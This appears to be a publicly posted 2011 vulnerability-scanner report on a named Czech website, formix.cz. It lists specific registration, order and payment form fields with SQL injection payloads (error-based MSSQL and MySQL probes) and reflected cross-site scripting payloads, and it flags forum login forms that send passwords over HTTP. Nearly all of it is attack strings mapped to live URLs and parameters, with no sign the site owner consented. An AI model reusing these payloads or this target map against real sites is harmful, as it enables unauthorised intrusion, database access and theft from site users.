sroub3k

formix.cz

Sep 3rd, 2011
  1. [High Possibility] SQL Injection
  2.  
  3. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  4.  
  5. http://www.formix.cz/skript/reg.php
  6. Parameter Name: jmeno
  7. Parameter Type: Post
  8. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  9.  
  10. http://www.formix.cz/skript/reg.php
  11. Parameter Name: email
  12. Parameter Type: Post
  13. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  14.  
  15. http://www.formix.cz/skript/reg.php
  16. Parameter Name: jmeno
  17. Parameter Type: Post
  18. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  19.  
  20. http://www.formix.cz/skript/reg.php
  21. Parameter Name: email
  22. Parameter Type: Post
  23. Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
  24.  
  25. http://www.formix.cz/skript/reg.php
  26. Parameter Name: jmeno
  27. Parameter Type: Post
  28. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  29.  
  30. http://www.formix.cz/skript/reg.php
  31. Parameter Name: kde
  32. Parameter Type: Post
  33. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  34.  
  35. http://www.formix.cz/skript/reg.php
  36. Parameter Name: kde
  37. Parameter Type: Post
  38. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  39.  
  40. http://www.formix.cz/skript/reg.php
  41. Parameter Name: kde
  42. Parameter Type: Post
  43. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  44.  
  45. http://www.formix.cz/skript/obj.php
  46. Parameter Name: licence
  47. Parameter Type: Post
  48. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  49.  
  50. http://www.formix.cz/skript/obj.php
  51. Parameter Name: licence
  52. Parameter Type: Post
  53. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  54.  
  55. http://www.formix.cz/skript/obj.php
  56. Parameter Name: platba
  57. Parameter Type: Post
  58. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  59.  
  60. http://www.formix.cz/skript/obj.php
  61. Parameter Name: platba
  62. Parameter Type: Post
  63. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  64.  
  65. http://www.formix.cz/skript/obj.php
  66. Parameter Name: licence
  67. Parameter Type: Post
  68. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  69.  
  70. http://www.formix.cz/skript/obj.php
  71. Parameter Name: licence
  72. Parameter Type: Post
  73. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  74.  
  75. http://www.formix.cz/skript/obj.php
  76. Parameter Name: platba
  77. Parameter Type: Post
  78. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  79.  
  80. http://www.formix.cz/skript/obj.php
  81. Parameter Name: platba
  82. Parameter Type: Post
  83. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  84.  
  85. http://www.formix.cz/skript/obj.php
  86. Parameter Name: licence
  87. Parameter Type: Post
  88. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  89. --------------------------------------------------------------------------------------------
  90.  
  91. XSS
  92. Cross-site Scripting
  93.  
  94. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  95.  
  96. http://www.formix.cz/skript/obj.php
  97. Parameter Name: email
  98. Parameter Type: Post
  99. Attack Pattern: '"--></style></script><script>alert(0x0001DC)</script>
  100.  
  101. http://www.formix.cz/skript/obj.php
  102. Parameter Name: licence
  103. Parameter Type: Post
  104. Attack Pattern: '"--></style></script><script>alert(0x000269)</script>
  105.  
  106. http://www.formix.cz/skript/obj.php
  107. Parameter Name: platba
  108. Parameter Type: Post
  109. Attack Pattern: '"--></style></script><script>alert(0x0002A8)</script>
  110.  
  111. http://www.formix.cz/skript/obj.php
  112. Parameter Name: platba
  113. Parameter Type: Post
  114. Attack Pattern: '"--></style></script><script>alert(0x00031B)</script>
  115.  
  116. http://www.formix.cz/skript/obj.php
  117. Parameter Name: licence
  118. Parameter Type: Post
  119. Attack Pattern: '"--></style></script><script>alert(0x000322)</script>
  120.  
  121. http://www.formix.cz/skript/obj.php
  122. Parameter Name: licence
  123. Parameter Type: Post
  124. Attack Pattern: '"--></style></script><script>alert(0x000362)</script>
  125.  
  126. http://www.formix.cz/skript/obj.php
  127. Parameter Name: email
  128. Parameter Type: Post
  129. Attack Pattern: '"--></style></script><script>alert(0x00037B)</script>
  130.  
  131. http://www.formix.cz/skript/obj.php
  132. Parameter Name: email
  133. Parameter Type: Post
  134. Attack Pattern: '"--></style></script><script>alert(0x0003B2)</script>
  135.  
  136. http://www.formix.cz/skript/obj.php
  137. Parameter Name: platba
  138. Parameter Type: Post
  139. Attack Pattern: '"--></style></script><script>alert(0x0003CD)</script>
  140.  
  141. http://www.formix.cz/skript/obj.php
  142. Parameter Name: licence
  143. Parameter Type: Post
  144. Attack Pattern: '"--></style></script><script>alert(0x0003D1)</script>
  145.  
  146. http://www.formix.cz/skript/obj.php
  147. Parameter Name: email
  148. Parameter Type: Post
  149. Attack Pattern: '"--></style></script><script>alert(0x00043B)</script>
  150.  
  151. http://www.formix.cz/skript/obj.php
  152. Parameter Name: platba
  153. Parameter Type: Post
  154. Attack Pattern: '"--></style></script><script>alert(0x000470)</script>
  155.  
  156. http://www.formix.cz/skript/obj.php
  157. Parameter Name: licence
  158. Parameter Type: Post
  159. Attack Pattern: '"--></style></script><script>alert(0x000475)</script>
  160.  
  161. http://www.formix.cz/skript/obj.php
  162. Parameter Name: email
  163. Parameter Type: Post
  164. Attack Pattern: '"--></style></script><script>alert(0x0004DC)</script>
  165. --------------------------------------------------------------------------------------------
  166.  
  167. [Possible] Cross-site Scripting
  168.  
  169. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  170. Notes: This page responds with an HTTP redirect status; therefore the detected XSS vulnerability
  171. might not be exploitable in many conditions. However, it still indicates a lack of correct filtering and should be addressed.
  172.  
  173. http://www.formix.cz/skript/reg.php
  174. Parameter Name: jmeno
  175. Parameter Type: Post
  176. Attack Pattern: '"--></style></script><script>netsparker(0x0001A2)</script>
  177.  
  178. http://www.formix.cz/skript/reg.php
  179. Parameter Name: email
  180. Parameter Type: Post
  181. Attack Pattern: '"--></style></script><script>netsparker(0x0001BD)</script>
  182.  
  183. http://www.formix.cz/skript/reg.php
  184. Parameter Name: jmeno
  185. Parameter Type: Post
  186. Attack Pattern: '"--></style></script><script>netsparker(0x0001CD)</script>
  187.  
  188. http://www.formix.cz/skript/reg.php
  189. Parameter Name: jmeno
  190. Parameter Type: Post
  191. Attack Pattern: '"--></style></script><script>netsparker(0x0001E5)</script>
  192.  
  193. http://www.formix.cz/skript/reg.php
  194. Parameter Name: email
  195. Parameter Type: Post
  196. Attack Pattern: '"--></style></script><script>netsparker(0x0001F0)</script>
  197.  
  198. http://www.formix.cz/skript/reg.php
  199. Parameter Name: kde
  200. Parameter Type: Post
  201. Attack Pattern: '"--></style></script><script>netsparker(0x000213)</script>
  202.  
  203. http://www.formix.cz/skript/reg.php
  204. Parameter Name: kde
  205. Parameter Type: Post
  206. Attack Pattern: '><script>netsparker(9)</script>
  207. --------------------------------------------------------------------------------------------
  208. Password Transmitted Over HTTP
  209.  
  210. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  211.  
  212. http://www.formix.cz/forum/index.php
  213. Form target action: login.php
  214.  
  215. http://www.formix.cz/forum/login.php
  216. Form target action: login.php